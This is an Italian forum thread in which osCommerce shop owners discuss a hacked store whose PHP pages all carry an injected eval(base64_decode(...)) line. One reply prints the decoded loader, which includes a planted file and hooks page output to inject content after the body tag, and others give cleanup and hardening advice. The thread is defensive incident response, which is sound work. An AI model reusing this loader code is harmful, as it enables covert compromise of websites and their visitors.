Problema sicurezza oscommerce codice malevolo

[giavara]

Ciao ragazzi,
modificando alcune pagine di un ehop mi sono accorto che TUTTE le pagine php hanno uno strano codice all'inizio della pagine.
Ovviamente il codice è stato inserito da qualcuno ed è crittografato.

Ve lo riporto

Codice: Seleziona tutto

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3No [...........] 0=')); ?>

Se sapete cos'è, cosa causa, se è malevolo, vi prego di dirmelo...

Come fanno ad aggiungere questi codici, oscommerce è un software sicuro fino a che punto?

Grazie e ciao a tutti!

[dynamo]

l'osc è stato sviluppato da qualcuno???

[giavara]

no è il 2.2 normale.
In più ho fatto tante modifiche e contribution.

Sapete se oscommerce è debole di sicurezza?
Ha qualche falle????
Magari hanno inserito quel codice con dei sql injection?

Nessuno sa niente????

Grazie ciao!

[hsg26]

oscommerce è sicuro come tutti gli altri opensource. Basta tenerlo aggiornato. leggi: RC2a.

il codice decodificato è questo:

Codice: Seleziona tutto

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/franfer/public_html/admin/includes/languages/english/modules/index/style.css.php')){include_once('/home/franfer/public_html/admin/includes/languages/english/modules/index/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

[hsg26]

questo è ciò che ti è successo:

http://forums.oscommerce.com/index.php?showtopic=336693

sei stato hackerato. Cambia le password dell'ftp, controlla i permessi delle cartelle, cambia le password al database, e riparti dall'ultimo backup senza quella stringa codificata. E: aggiorna oscommerce. molto probabilmente usi una versione non aggiornata.

[marcus]

La causa probabile di questo tipo di nuovi attacchi è una grave falla venuta fuori recentemente e di cui potete leggere i dettagli qui:

http://www.vupen.com/english/advisories/2009/2496

Possibili rimedi alternativi per questo problema:

- se non usate il file_manager.php toglietelo
- proteggete l'admin con .htaccess
- cambiate nome alla cartella admin


Saluti
Marcus

[marzioscaglione]

La causa probabile di questo tipo di nuovi attacchi è una grave falla venuta fuori recentemente e di cui potete leggere i dettagli qui:

http://www.vupen.com/english/advisories/2009/2496

Possibili rimedi alternativi per questo problema:

- se non usate il file_manager.php toglietelo
- proteggete l'admin con .htaccess
- cambiate nome alla cartella admin


Saluti
Marcus

Grazie per il suggerimento, ho già provveduto a cancellare il file file_manager.php .

Ringrazio ancora per il pronto supporto che date, specialmente sulla sicurezza di Oscommerce.

Saluti
Marzio

[giavara]

Ringrazio anch'io!
Comunque ho la versione aggiornata! 2.2 Rca !!!
Può dipendere dal fatto che il sito è ospitato su server americani o è una grossa cazz**** ??

Dal codice che ha decodificato hsg26 (se spieghi come fai mi arrangio ) ho visto che si nomina il file "public_html/admin/includes/languages/english/modules/index/style.css.php"

sono andato a vedere dentro la cartella, ci dovrebbero essere solo custoumers.php e orders.php
invece ci sono:
cnf
csi
dg.php
lock
s.php
skwd
style.css.php
swf

Il file style.css.php menzionato nel codice eval di ogni pagina riporta dell'altro codice eval, come dg.php e s.php
Ora cancello tutto? meglio cancellare uno per uno tutto il codice all'inizio delle pagine?

Ora provo a leggere le pagine in inglese che mi avete sottoposto.

Grazie intanto ciao!
Andrea

[hsg26]

confronta con un backup...così vedi quali files sono stati aggiunti.

Cambia tutte le varie password ftp e db.

in ogni caso tutti i files in qualche modo collegati con style.css.php sono da eliminare di corsa.

per decodificare, cerca in google eval 64 decoder... e trovi siti dove copiare la stringa.

[hsg26]

x tutti:

provate ad installare queste contribution, servono tutte alla sicurezza di oscommerce:

http://forums.oscommerce.com/index.php?showtopic=313323

[marcus]

Ringrazio anch'io!
Comunque ho la versione aggiornata! 2.2 Rca !!!
Può dipendere dal fatto che il sito è ospitato su server americani o è una grossa cazz**** ??

Il server americano non c'entra niente.
Sono affette le versioni osCommerce Online Merchant version 2.2 RC2a e precedenti.

Per ripristinare il sistema elimina tutti i files anomali e controlla anche quelli di osC che sono stati modificati.
Per questa operazione basta controllare le date di ultima modifica.

Per evitare future iniezioni di codice maligno:
- se non usi il file_manager.php toglilo oppure
- proteggi l'admin con .htaccess oppure
- cambia nome alla cartella admin


Saluti
Marcus